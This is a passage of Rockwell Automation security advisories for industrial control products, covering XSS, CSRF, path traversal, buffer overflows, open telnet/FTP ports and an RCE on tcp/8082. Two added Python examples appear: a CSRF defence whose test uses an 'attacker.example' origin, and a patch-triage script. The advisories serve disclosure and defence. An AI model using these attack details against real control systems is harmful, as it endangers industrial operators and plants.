A cross site scripting vulnerability was discovered. This could allow a threat actor with admin privileges and network access to view user data and modify the web interface. This could also cause interruptions to the availability of the web page.

CVSS Base Score: 4.7 (Medium)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L
CWE: CWE-20 Improper Input Validation


CVE-2023-29029 IMPACT
A cross site scripting security issue was discovered. This could allow a threat actor with admin privileges and network access to view user data and modify the web interface. This could also cause interruptions to the availability of the web page.

CVSS Base Score: 4.7 (Medium)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L
CWE: CWE-20 Improper Input Validation


CVE-2023-29022 IMPACT
A cross site scripting security issue was discovered. This could allow a threat actor with admin privileges and network access to view user data and modify the web interface. This could also cause interruptions to the availability of the web page.

CVSS Base Score: 4.7 (Medium)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L
CWE: CWE-20 Improper Input Validation



Customers can use Stakeholder-Specific Vulnerability Categorization to create more environment specific categories.

Risk Mitigation & User Action

Customers using the affected software should use the below risk mitigation.
  • Disable the webserver during normal use. The webserver is disabled by default and should only be enabled to modify configurations. After modifying configurations, the web server should be disabled.
  • For information on how to mitigate Security Risks on industrial automation control systems (IACS) networks see the following publications:
    • System Security Design Guidelines Reference Manual publication, SECURE-RM001
    • Configure System Security Features User Manual, SECURE-UM001
  • Customers should use our QA43240 - Recommended Security Guidelines from Rockwell Automation to minimize risks.

Additional Resources

  • CVE-2023-29022 JSON
  • CVE-2023-29023 JSON
  • CVE-2023-29024 JSON
  • CVE-2023-29025 JSON
  • CVE-2023-29026 JSON
  • CVE-2023-29027 JSON
  • CVE-2023-29028 JSON
  • CVE-2023-29029 JSON
  • CVE-2023-29030 JSON
  • CVE-2023-29031 JSON

Glossary

Cross Site Scripting Vulnerability: (XSS) a web security vulnerability that allows an attacker to inject malicious scripts into content from otherwise trusted websites

 

Critical
PN1623 | PN1623 | PanelView™ 800 – Remote Code Execution Vulnerabilities
Published Date:
May 11, 2023
Last Updated:
September 08, 2025
CVE IDs:
CVE-2019-16748, CVE-2020-36177
Products:
PanelView 800
CVSS Scores:
9.8
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

 

Revision Number
1.1
Revision History
Version 1.0 - May 11, 2023
Version 1.1 - September 8, 2025

Affected Products

Affected Product | First Known in Software Version | Corrected in Software Version
PanelView™ 800 - 2711R-T4T | V5.011 | V8.011
PanelView™ 800 - 2711R-T7T | V5.011 | V8.011
PanelView™ 800 - 2711R-T10T | V5.011 | V8.011

Vulnerability Details

Rockwell Automation uses the latest version of the CVSS scoring system to assess the following security issues.

CVE-2020-36177 IMPACT
RsaPad_PSS in WolfSSL before version 4.6.0 has an out-of-bounds write for certain relationships between key size and digest size. WolfSSL is utilized in the PanelView™ 800, and this could allow an attacker to accomplish a heap buffer overflow if the user has the email feature enabled in the project file where WolfSSL is used. The feature is disabled by default.

CVSS Base Score: 9.8
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWE: CWE-787 Out-Of-Bounds Write


Known Exploited Vulnerability (KEV) database: No

CVE-2019-16748 IMPACT
In WolfSSL through version 4.1.0, there is a missing sanity check of memory accesses when parsing ASN.1 certificate data during handshaking, resulting in a one-byte heap-based buffer over-read in CheckCertSignature_ex in wolfcrypt/src/asn.c. WolfSSL is utilized in the PanelView™ 800, and this could allow an attacker to accomplish a heap buffer overflow if the user has the email feature enabled in the project file where WolfSSL is used. This feature is disabled by default.

CVSS Base Score: 9.8
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
CWE: CWE-125 Out-Of-Bounds Read


Known Exploited Vulnerability (KEV) database: No

Customers can use Stakeholder-Specific Vulnerability Categorization to create more environment-specific categories.

Risk Mitigation & User Action

Customers using the affected software should use the below risk mitigations.
  • Upgrade to V8.011 which has been patched to mitigate these issues.
  • Ensure that the email feature is disabled (This is disabled by default).
  • For information on how to mitigate Security Risks on industrial automation control systems (IACS) networks see the following publications:
    • System Security Design Guidelines Reference Manual publication, SECURE-RM001
    • Configure System Security Features User Manual, SECURE-UM00
  • Customers should use our QA43240 - Recommended Security Guidelines from Rockwell Automation to minimize risks.

Additional Resources

  • CVE-2020-36177 JSON
  • CVE-2019-16748 JSON

Glossary

ASN.1: Abstract Syntax Notation One is a standard interface description language for defining data structures that can be serialized and deserialized in a cross-platform way

Handshaking: the process of establishing a connection between two devices or systems before actual data transmission begins

Heap-based Memory Buffer Overflow: a type of buffer overflow that occurs in the heap data area. Memory on the heap is dynamically allocated at runtime and typically contains program data. 

Out-of-Bounds Write: when the software writes data past the end or before the beginning of an intended buffer, leading to data corruption, crashes or code execution

RsaPad_PSS: (RSA-Public Key Signature Scheme) a cryptographic method that uses the RSA algorithm for signing and verifying messages

WolfSSL: a small, portable SSL/TLS library designed for embedded system and RTOS environments

 

High
PN1626 | Cross Site Request Forgery in FactoryTalk® Vantagepoint®
Published Date:
May 11, 2023
Last Updated:
September 26, 2025
CVE IDs:
CVE-2023-2444
Products:
FactoryTalk VantagePoint
CVSS Scores:
7.1
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

Revision Number
1.1
Revision History
Version 1.0 - May 11, 2023
Version 1.1 - September 26, 2025

Affected Products

Affected Product | First Known in Software Version | Corrected in Software Version
FactoryTalk® Vantagepoint® | <v8.40 | V8.40 and later

Vulnerability Details

Rockwell Automation uses the latest version of the CVSS scoring system to assess security issues.

CVE-2023-2444 IMPACT
A cross site request forgery security issue exists in the affected product. It can be exploited in two ways. In the first, an attacker sends a harmful link to a computer that is on the same domain as the FactoryTalk® Vantagepoint® server. When a user clicks the link, the attacker impersonates the legitimate user and sends requests to the affected product.

In the second, an attacker sends an untrusted link to a computer that is not on the same domain as the server. A user then opens the FactoryTalk® Vantagepoint® website and enters credentials for the FactoryTalk® Vantagepoint® server. If the user then clicks the harmful link, the cross site request forgery attack succeeds.

CVSS Base Score: 7.1/10
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:H/A:H
CWE: CWE-345 Insufficient Verification of Data Authenticity


Known Exploited Vulnerability (KEV) database: No

Customers can use Stakeholder-Specific Vulnerability Categorization to create more environment specific categories.
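
In both paths described above the browser attaches the victim's authenticated session to a request the victim did not intend to make. The following is an added example, not FactoryTalk VantagePoint code, of the two server-side checks that defeat such requests: an Origin/Referer comparison, which blocks a link hosted on another site, and a per-session synchronizer token, which blocks a forged request even when it arrives from the same domain. The trusted origin is an assumed placeholder and the requests in demo() are constructed, not captured traffic.

```python
import hmac
import secrets
from urllib.parse import urlsplit

# Added example, not FactoryTalk VantagePoint code. The origin below is an assumed
# placeholder, and the requests in demo() are constructed, not captured traffic.
TRUSTED_ORIGIN = "https://vantagepoint.example"


def issue_csrf_token(session: dict) -> str:
    """Mint a per-session secret, keep it server-side, and embed it in each form."""
    token = secrets.token_urlsafe(32)
    session["csrf_token"] = token
    return token


def _origin_of(url: str) -> str:
    p = urlsplit(url)
    return f"{p.scheme}://{p.netloc}".lower()


def is_state_change_allowed(session: dict, headers: dict, form: dict) -> bool:
    """Gate every POST/PUT/DELETE handler. Both checks must pass."""
    hdr = {k.lower(): v for k, v in headers.items()}
    # Check 1: the request must originate from our own site. The browser sets
    # Origin (or Referer) itself and page script cannot rewrite it, so a link
    # hosted elsewhere arrives carrying that other site's origin.
    source = hdr.get("origin") or hdr.get("referer")
    if not source or _origin_of(source) != TRUSTED_ORIGIN:
        return False
    # Check 2: the form must carry the session's token. The same-origin policy
    # keeps another site from reading it, so a forged form cannot supply the right
    # value even though the browser attaches the victim's session cookie for free.
    expected = session.get("csrf_token")
    supplied = form.get("csrf_token")
    if not expected or not supplied:
        return False
    return hmac.compare_digest(expected, supplied)


def demo() -> dict:
    """Constructed requests against one logged-in session."""
    session = {"user": "operator"}   # cookie-backed; the browser sends it on every request
    token = issue_csrf_token(session)
    cookie = {"Cookie": "sid=constructed-session-id"}
    legit = is_state_change_allowed(
        session, {"Origin": TRUSTED_ORIGIN, **cookie},
        {"action": "update_display", "csrf_token": token})
    # The advisory's second path: the user has already signed in, then follows a
    # link hosted on another site that submits to the server.
    forged = is_state_change_allowed(
        session, {"Origin": "https://attacker.example", **cookie},
        {"action": "update_display"})
    # The first path: a request from the trusted origin that lacks the token,
    # or carries a guessed one, is still refused.
    no_token = is_state_change_allowed(
        session, {"Origin": TRUSTED_ORIGIN, **cookie}, {"action": "update_display"})
    guessed = is_state_change_allowed(
        session, {"Origin": TRUSTED_ORIGIN, **cookie},
        {"action": "update_display", "csrf_token": "not-the-token"})
    return {"legit": legit, "forged": forged, "no_token": no_token, "guessed": guessed}
```

The gate belongs on every handler that changes state; an endpoint that performs a change on a plain GET link bypasses both checks by design, which is why state-changing actions should require POST in the first place.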

Risk Mitigation & User Action

Customers using the affected software should use our security best practices to minimize risks.
  • Provide training about social engineering attacks, such as phishing.
  • QA43240 - Recommended Security Guidelines from Rockwell Automation

Additional Resources

  • CVE-2023-2444 JSON

Glossary

Cross Site Request Forgery: (CSRF) an attack that forces an end user to execute unwanted actions on a web application in which they’re currently authenticated

Phishing: cyberattack that uses fraudulent emails, text messages, phone calls or websites to trick people into sharing sensitive data, downloading malware or otherwise exposing themselves to cybercrime

 

Critical
PN1624 | Open Ports Vulnerability in Kinetix 5500 EtherNet/IP Servo Drive
Published Date:
May 11, 2023
Last Updated:
October 16, 2024
CVE IDs:
CVE-2023-1834
Products:
2198 Kinetix 5500 Drive
CVSS Scores (v3.1):
9.4
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
No

Revision Number
1.1
Revision History
Version 1.0 - May 11, 2023
Version 1.1 - September 10, 2025 - Updated for readability

Affected Products

Affected Product | First Known in Firmware Revision | Corrected in Firmware Revision
Kinetix 5500 manufactured between May 2022 and January 2023* | v7.13 | Customers should upgrade to v7.14 or later to close the ports, which mitigates this issue.

*The manufacturing date of the drive is stated on the product label.

Security Issue Details

Rockwell Automation uses the latest version of the CVSS scoring system to assess security issues.

CVE-2023-1834 IMPACT
Rockwell Automation was made aware that Kinetix® 5500 drives manufactured between May 2022 and January 2023 and running v7.13 may have the telnet and FTP ports open by default. This could allow attackers unauthorized access to the device through the open ports.

CVSS Base Score: 9.4/10
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:H
CWE: CWE-284 Improper Access Control


Known Exploited Vulnerability (KEV) database: No

Customers can use Stakeholder-Specific Vulnerability Categorization to create more environment specific categories.

Risk Mitigation & User Action

Customers using the affected drives should use the risk mitigations and our suggested security best practices to minimize risks.
  • Upgrade to v7.14
  • QA43240 - Recommended Security Guidelines from Rockwell Automation

Additional Resources

  • CVE-2023-1834 JSON

Glossary

FTP: (File Transfer Protocol) uses two primary ports for its operations: Port 21 and Port 20. These ports play distinct roles in facilitating file transfers between clients and servers.

Known Exploited Vulnerability (KEV) database: an official list of security flaws that attackers have actively exploited

Telnet: (Teletype Network) a client/server application protocol that provides access to virtual terminals of remote systems on local area networks or the Internet

High
PN1621 | Arena® Simulation – Multiple Vulnerabilities
Published Date:
May 09, 2023
Last Updated:
September 08, 2025
CVE IDs:
CVE-2023-29460, CVE-2023-29462, CVE-2023-29461
Products:
Arena
CVSS Scores:
7.8
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

Revision Number
1.1
Revision History
Version 1.0 - May 9, 2023
Version 1.1 - September 8, 2025 - Update for better readability

Affected Products

Affected Product | First Known in Software Version | Corrected in Software Version
Arena® Simulation Software | V16.00 | 16.20.01

Security Issue Details

Rockwell Automation used the latest version of the CVSS scoring system to assess the following security issues.

CVE-2023-29460 IMPACT
An arbitrary code execution security issue was reported to Rockwell Automation that could allow a threat actor to execute unauthorized arbitrary code in the software by means of a memory buffer overflow.

CVSS Base Score: 7.8
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
CWE: CWE-119 Incorrect Restriction of Operations in the Memory Buffer


Known Exploited Vulnerability (KEV) database: No

CVE-2023-29461 IMPACT
An arbitrary code execution security issue was reported to Rockwell Automation that could allow a threat actor to execute unauthorized arbitrary code in the software by means of a heap-based memory buffer overflow.

CVSS Base Score: 7.8
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
CWE: CWE-119 Incorrect Restriction of Operations in the Memory Buffer


Known Exploited Vulnerability (KEV) database: No

CVE-2023-29462 IMPACT
An arbitrary code execution security issue was reported to Rockwell Automation that could allow a threat actor to execute unauthorized arbitrary code in the software by means of a heap-based memory buffer overflow.

CVSS Base Score: 7.8
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
CWE: CWE-119 Incorrect Restriction of Operations in the Memory Buffer


Known Exploited Vulnerability (KEV) database: No

Customers can use Stakeholder-Specific Vulnerability Categorization to create more environment-specific categories.

Risk Mitigation & User Action

Customers using the affected software should use the below risk mitigations.
  • Upgrade to 16.20.01 which has been patched to mitigate these issues.
  • For information on how to mitigate Security Risks on industrial automation control systems (IACS) networks see the following publications:
    • System Security Design Guidelines Reference Manual publication, SECURE-RM001
    • Configure System Security Features User Manual, SECURE-UM001
  • Customers should use our QA43240 - Recommended Security Guidelines from Rockwell Automation to minimize risks.

Additional Resources

  • CVE-2023-29460 JSON
  • CVE-2023-29461 JSON
  • CVE-2023-29462 JSON

Glossary

Arbitrary Code Execution: an attacker's ability to run any commands or code of the attacker's choice on a target machine or in a target process

Known Exploited Vulnerability (KEV) database: an official list of security flaws that attackers have actively exploited

Memory Buffer Overflow: occurs when a program writes more data to a buffer than it can hold. This can lead to data corruption, program crashes, or unintended behavior 

 

Critical
PN1410 | FactoryTalk® Diagnostics Vulnerable to Remote Code Execution
Published Date:
April 10, 2023
Last Updated:
April 10, 2023
CVE IDs:
CVE-2020-6967
Products:
FactoryTalk Services Platform
CVSS Scores:
9.8
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No
Revision Number
1.3
Revision History
Version 1.0 – February 20, 2020. Initial Release
Version 1.1 – June 18, 2020. Pwn2Own Co-Discovery
Version 1.2 – February 10, 2023
Version 1.3 – April 10, 2023 – Added v6.31 Mitigations

Executive Summary

The Zero Day Initiative (ZDI), part of the information security company Trend Micro, reported a remote code execution (RCE) vulnerability in FactoryTalk® Services Platform to Rockwell Automation. Specifically, the vulnerability is found in the FactoryTalk Diagnostics subsystem, which provides customers the functionality to collect and view diagnostic messages from the FactoryTalk system for analysis and troubleshooting purposes.


FactoryTalk Diagnostics is utilized by many Rockwell Automation® products. We encourage customers to follow the steps provided to understand if they are affected.

Special thanks to rgod of 9sg working with ZDI to find this vulnerability. This vulnerability was co-discovered during the first ever Industrial Control Systems (ICS) Pwn2Own competition hosted by Trend Micro’s Zero Day Initiative (ZDI).

Affected Products

FactoryTalk Services Platform (v2.00 – v6.11)
The FactoryTalk Services Platform is delivered as part of the FactoryTalk suite of software from Rockwell Automation, including most products branded FactoryTalk or Studio 5000® software.

Vulnerability Details

CVE-2020-6967: Remote Code Execution due to Vulnerable .NET Remoting Instance
FactoryTalk Diagnostics exposes a remote network port at tcp/8082, which may allow an attacker to execute arbitrary code with SYSTEM level privileges.

CVSS v3.1 Base Score: 9.8/CRITICAL
CVSS Vector String: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

ZDI Tracking: ZDI-CAN-10268

Risk Mitigation & User Action

Rockwell Automation will resolve this vulnerability in the next release of the FactoryTalk Services Platform. Until then, customers using the affected software are directed towards risk mitigation. They are encouraged, when possible, to combine this guidance with the general security guidelines for a comprehensive defense in depth strategy. Please subscribe to updates to this advisory and the PN1354 - Industrial Security Advisory Index to stay notified.

Update: The vulnerability has been resolved with the release of FactoryTalk Services Platform V6.31.

Product Family | Suggested Actions
FactoryTalk Services Platform V6.31 | No actions are necessary:
  • This version supports use of Microsoft Windows Communication Foundation (WCF), which avoids the vulnerability.
  • This version supports use of .NET Remoting (system default) with connections restricted to a local port, mitigating the vulnerability.

Product Family | Suggested Actions
FactoryTalk Services Platform V2.00 – V6.11

We have provided guidance for customers affected by this vulnerability to assess whether the service is installed, and steps for implementing the recommended mitigations. Customers should consider implementing the following measures based on their needs:

  • Upgrade to FactoryTalk Services Platform V6.31.
  • For versions that predate v6.20, upgrade to version 6.20 or later; this version restricts connection settings to only the local port. If it is not possible to update:
  • Alternately for versions 2.74, 2.80, 2.81, 2.90, 3.00, 6.10, or 6.11, install the patch at BF24822 - Patch: FactoryTalk Diagnostics Local Reader service connection settings restricted to local access only, FactoryTalk Services 6.11, 6.10, 3.00, 2.90, 2.80, 2.81, 2.74 to restrict connections settings to only the local port.
  • For versions that predate v2.74 it is recommended to upgrade to a more recent version.
  • Disable the Remote Diagnostics Service if this service is not in use. Disabling this service does not result in data loss.
  • If the service is in use, use Windows Firewall configuration to help prevent remote connection to the affected port.
  • Steps to perform both solutions can be found in Risk mitigation for FactoryTalk Diagnostics remoting endpoint.

Note: A Snort rule for this issue is available in Snort’s developer rules (sid: 32474).

General Security Guidelines

Network-based Vulnerability Mitigations for Embedded Products

  • Utilize proper network infrastructure controls, such as firewalls, to help ensure that .NET Remoting traffic from unauthorized sources is blocked.
  • Ensure that software-based firewalls are running with current rule sets and enforced on individual systems.
  • Consider implementing network security protocols for software systems, such as IPSec. Documentation is available in QA46277 - Deploying FactoryTalk Software with IPsec, outlining guidelines for implementing IPSec with FactoryTalk applications.

Software/PC-based Mitigation Strategies

  • Use of Microsoft® AppLocker or other similar whitelisting application can help mitigate risk. Information on using AppLocker with Rockwell Automation products is available in QA17329 - Using Rockwell Automation Software Products with AppLocker.
  • Ensure that the least-privilege user principle is followed, and user/service account access to shared resources (such as a database) is only granted with a minimum number of rights as needed.

General Mitigations

  • Use trusted software, software patches, and antivirus/antimalware programs, and interact only with trusted websites and attachments.
  • Minimize network exposure for all control system devices and/or systems and ensure that they are not accessible from the Internet. For further information about the risks of unprotected Internet accessible control systems, please see PN715 - Advisory on web search tools that identify ICS devices and systems connected to the Internet.
  • Locate control system networks and devices behind firewalls and isolate them from the business network.
  • When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.

For further information on the Vulnerability Handling Process for Rockwell Automation, please refer to our Product Security Incident Response FAQ document.

See our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

See the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to updates on the PN1354 - Industrial Security Advisory Index for Rockwell Automation.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions website.

Requests for additional information can be sent to the RASecure Inbox (rasecure@ra.rockwell.com).
Please direct all media inquiries to Kolve Byrd (KAByrd@ra.rockwell.com).

Additional Links

  • PN1354 - Industrial Security Advisory Index
  • Industrial Firewalls within a CPwE Architecture
  • Deploying Industrial Firewalls within a CPwE Architecture Design and Implementation Guide
  • ICSA-20-051-02
  • ZDI-20-261

Critical
PN1618 | ThinManager Software Path Traversal and Denial-Of-Service Attack
Published Date:
March 21, 2023
Last Updated:
September 08, 2025
CVE IDs:
CVE-2023-27855, CVE-2023-27857, CVE-2023-27856, CVE-2023-28757
Products:
ThinManager
CVSS Scores:
7.5, 9.8
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No
Revision Number
1.1
Revision History
Version 1.0 – March 21, 2023 – Initial Version
Version 1.1 - September 8, 2025 - Updated for better readability

Executive Summary

A security issue in the ThinManager® ThinServer™ software was discovered by Tenable security researchers and reported to Rockwell Automation. Successful exploitation of this security issue could allow a threat actor to perform remote code execution on the target or crash the software.

Affected Products

ThinManager ThinServer software Versions
6.x – 10.x
11.0.0 – 11.0.5
11.1.0 – 11.1.5
11.2.0 – 11.2.6
12.0.0 – 12.0.4
12.1.0 – 12.1.5
13.0.0-13.0.1

Security Issue Details

CVE-2023-27855 ThinManager ThinServer Path Traversal Upload

CVSS Base Score: 9.8 /10 (Critical)
CVSS 3.1 Vector String: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H


A path traversal exists when processing a message. An unauthenticated remote attacker could use this security issue to upload arbitrary files to any directory on the disk drive where ThinServer.exe is installed. The attacker can overwrite existing executable files with attacker-controlled, malicious content, which could result in remote code execution.

CVE-2023-27856 ThinManager ThinServer Path Traversal Download

CVSS Base Score: 7.5 /10 (High)
CVSS 3.1 Vector String: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N


A path traversal exists when processing a message of type 8 in the affected versions. An unauthenticated remote attacker can use this security issue to download arbitrary files on the disk drive where ThinServer.exe is installed.

CVE-2023-27857 ThinManager ThinServer Heap-Based Buffer Overflow

CVSS Base Score: 7.5/10 (High)
CVSS 3.1 Vector String: AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H


A heap-based buffer over-read condition occurs when a message's length field indicates more data than is actually present in the message. An unauthenticated remote attacker can use this security issue to crash ThinServer.exe due to a read access violation.

Risk Mitigation & User Action

Customers should use the risk mitigations provided and combine them with the general security guidelines to employ multiple strategies simultaneously.

CVE-2023-27855, CVE-2023-27856, CVE-2023-27857
First Known Affected | Fixed Versions
6.x – 10.x | These versions are retired. Please update to a supported version.
11.0.0 – 11.0.5 | Update to v11.0.6
11.1.0 – 11.1.5 | Update to v11.1.6
11.2.0 – 11.2.6 | Update to v11.2.7
12.0.0 – 12.0.4 | Update to v12.0.5
12.1.0 – 12.1.5 | Update to v12.1.6
13.0.0 – 13.0.1 | Update to v13.0.2
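
Applied across a fleet, the version table above is a lookup that is easy to get wrong by hand (a 11.2.7 install is already fixed; a 10.x install has no patch to wait for; a 13.1 install is not covered at all). The following added example, not Rockwell Automation tooling, turns the table into a triage function over a constructed hostname,version inventory; the rows of FIX_TABLE are copied from the advisory and nothing else is assumed about ThinManager.

```python
import re

# Added example, not Rockwell Automation tooling: maps an installed ThinServer
# version to the fix listed in the advisory table. The inventory is constructed.

# (first affected, last affected, fixed version) rows, copied from the advisory table
FIX_TABLE = [
    ((11, 0, 0), (11, 0, 5), "11.0.6"),
    ((11, 1, 0), (11, 1, 5), "11.1.6"),
    ((11, 2, 0), (11, 2, 6), "11.2.7"),
    ((12, 0, 0), (12, 0, 4), "12.0.5"),
    ((12, 1, 0), (12, 1, 5), "12.1.6"),
    ((13, 0, 0), (13, 0, 1), "13.0.2"),
]
RETIRED_MAJORS = range(6, 11)   # 6.x – 10.x: retired, no fixed release is offered


def parse_version(text: str) -> tuple:
    """'12.0.3', 'v11.0.6' or '9.0' -> (major, minor, patch); rejects anything else."""
    m = re.fullmatch(r"v?(\d+)\.(\d+)(?:\.(\d+))?", text.strip())
    if not m:
        raise ValueError(f"unrecognised ThinServer version: {text!r}")
    return tuple(int(part or 0) for part in m.groups())


def triage(version_text: str) -> tuple:
    """Return (status, fixed_version); status is 'retired', 'affected',
    'fixed' or 'unlisted'."""
    v = parse_version(version_text)
    if v[0] in RETIRED_MAJORS:
        return ("retired", None)
    for first, last, fixed in FIX_TABLE:
        if first <= v <= last:
            return ("affected", fixed)
        if v[:2] == first[:2] and v > last:
            return ("fixed", None)       # on or past the patched release of this line
    return ("unlisted", None)            # a release line the advisory does not cover


def triage_inventory(csv_text: str) -> dict:
    """hostname,version per line -> {hostname: (status, fixed_version)}"""
    result = {}
    for line in csv_text.strip().splitlines():
        host, version = (x.strip() for x in line.split(",", 1))
        result[host] = triage(version)
    return result


# Constructed sample inventory, not data from any real site.
SAMPLE_INVENTORY = """\
thinserver-a,12.0.3
thinserver-b,11.2.7
thinserver-c,10.0.2
thinserver-d,13.1.0
"""

if __name__ == "__main__":
    for host, (status, fixed) in triage_inventory(SAMPLE_INVENTORY).items():
        print(f"{host}: {status}" + (f" -> update to {fixed}" if fixed else ""))
```

Treat "unlisted" as a prompt to re-check the advisory's current revision rather than as a clean bill of health: a release line that post-dates the advisory is not assessed by it either way.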

Additional Mitigations

If customers are unable to update to the patched version, the following mitigations should be put in place:
  • Limiting remote access to TCP port 2031 to known thin clients and ThinManager servers would limit some access to exploit this vulnerability.

For additional security best practices, please see our Knowledgebase article, QA43240 - Recommended Security Guidelines from Rockwell Automation, to maintain your environment.

References

  • QA41731 - ThinManager Upgrade Instructions
  • CVE-2023-27855
  • CVE-2023-27856
  • CVE-2023-28757

Glossary

Heap-Based Buffer Over-Read Condition: a type of buffer overflow flaw where the overrun occurs in the heap data area. An over-read condition occurs when a program, while reading data from a buffer, overruns the buffer’s boundary and reads adjacent memory

Path Traversal: allows attackers to access files and directories that are stored outside the intended directory

 

Medium
PN1619 | Modbus TCP AOI Server Could Leak Sensitive Information
Published Date:
March 16, 2023
Last Updated:
October 16, 2024
CVE IDs:
CVE-2023-0027
Products:
1768/1769/5069 CompactLogix, 1756 ControlLogix
CVSS Scores (v3.1):
5.3
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
No

Revision Number
1.1
Revision History
Version 1.0 – March 16, 2023
Version 1.1 – September 26, 2025 – Updated for better readability

Executive Summary

Rockwell Automation received a report from researchers at Veermata Jijabai Technological Institute of a security issue. This security issue is contained within the Modbus TCP Server Add-On Instructions (AOI) for ControlLogix® and CompactLogix™ controllers. This could allow an unauthorized user to gain information when the Modbus TCP Server AOI accepts a malformed request.

Additional details relating to the discovered security issue, including affected products and recommended countermeasures, are provided in this security disclosure.

Affected Products

  • Modbus TCP Server Add-On Instruction (AOI) for ControlLogix and CompactLogix controllers, used to connect to other devices via Modbus TCP protocol. Rockwell Automation Sample Code Library ID:101037.
    • Customers who do not use the AOI with a controller are not impacted.
    • The Modbus TCP Client AOI, that is a part of this sample code library, does not have this security issue.

Security Issue Details

CVE-2023-0027 Rockwell Automation Modbus TCP Server Add-On Instruction Could Leak Sensitive Information
While the Modbus TCP Server AOI is in use, a threat actor could send an abnormal message. This would cause the controller to respond with a copy of the most recent response to the last valid request. If exploited, an attacker could read the connected device’s Modbus TCP Server AOI information. It is impossible to exploit this security issue without knowing the Modbus address of the last valid request.


CVSS v3.1 Base Score: 5.3/10 [Medium]
CVSS v3.1 Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Risk Mitigation & User Action

Customers using the products should use the following mitigations and apply them to their deployed products.
Products Affected | First Known Version Affected | Corrected In
Modbus TCP Add-On Instructions (AOI) Sample Code | 2.00.00 | This issue has been mitigated in the following AOI versions: 2.04.00 and later

General Security Guidelines

General security guidelines can be found in QA43240 - Recommended Security Guidelines from Rockwell Automation.

Requests for additional information can be sent to the PSIRT Inbox (PSIRT@rockwellautomation.com).

Additional Links

  • PN1354 - Industrial Security Advisory Index
  • CVE-2023-0027 JSON

Disclaimer

This document is intended to provide general technical information on a particular subject or subjects and is not an exhaustive treatment of such subjects. Accordingly, the information in this document is not intended to constitute application, design, software or other professional engineering advice or services. Before making any decision or taking any action, which might affect your equipment, you should consult a qualified professional advisor.

ROCKWELL AUTOMATION DOES NOT WARRANT THE COMPLETENESS, TIMELINESS OR ACCURACY OF ANY OF THE DATA CONTAINED IN THIS DOCUMENT AND MAY MAKE CHANGES THERETO AT ANY TIME IN ITS SOLE DISCRETION WITHOUT NOTICE. FURTHER, ALL INFORMATION CONVEYED HEREBY IS PROVIDED TO USERS "AS IS." IN NO EVENT SHALL ROCKWELL AUTOMATION BE LIABLE FOR ANY DAMAGES OF ANY KIND INCLUDING DIRECT, INDIRECT, INCIDENTAL, CONSEQUENTIAL, LOST PROFIT OR DAMAGE, EVEN IF ROCKWELL AUTOMATION HAS BEEN ADVISED OFTHE POSSIBILITY OF SUCH DAMAGES.

ROCKWELL AUTOMATION DISCLAIMS ALL WARRANTIES WHETHER EXPRESSED OR IMPLIED IN RESPECT OF THE INFORMATION (INCLUDING SOFTWARE) PROVIDED HEREBY, INCLUDING THE IMPLIED WARRANTIES OF FITNESS FOR A PARTICULAR PURPOSE, MERCHANTABILITY, AND NON-INFRINGEMENT. NOTE THAT CERTAIN JURISDICTIONS DO NOT COUNTENANCE THE EXCLUSION OF IMPLIED WARRANTIES; THUS, THIS DISCLAIMER MAY NOT APPLY TO YOU.

 

Medium
PN1554 | CompactLogix 5370 and ControlLogix 5570 Controllers Vulnerable to Denial of Service Conditions due to Improper Input Validation
Published Date:
February 07, 2023
Last Updated:
February 07, 2023
CVE IDs:
CVE-2020-6998
Products:
1769 Compact GuardLogix 5370, 1769 CompactLogix 5370
CVSS Scores:
5.8
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No
Revision Number
1.2
Revision History
Version 1.0 – March 2, 2021. Initial Release
Version 1.2 – February 7, 2023 - Updated affected products and risk mitigations section

Executive Summary

CompactLogix™ 5370 and ControlLogix® 5570 Programmable Automation Controllers (PACs) contain a vulnerability in the connection establishment algorithm that could allow a remote, unauthenticated attacker to cause infinite wait times in communications with other products resulting in denial of service conditions. The Cybersecurity & Infrastructure Security Agency (CISA) reported this vulnerability to Rockwell Automation by way of an anonymous researcher.

Customers using the affected products are strongly encouraged to evaluate the mitigations provided below and apply the appropriate mitigations to their deployed products.

Affected Products

The following products are affected:
  • CompactLogix 5370
  • Compact GuardLogix 5370
  • ControlLogix 5570
  • ControlLogix 5570 redundancy
  • GuardLogix 5570

Vulnerability Details

CVE-2020-6998: Improper Input Validation Causes Denial of Service Condition
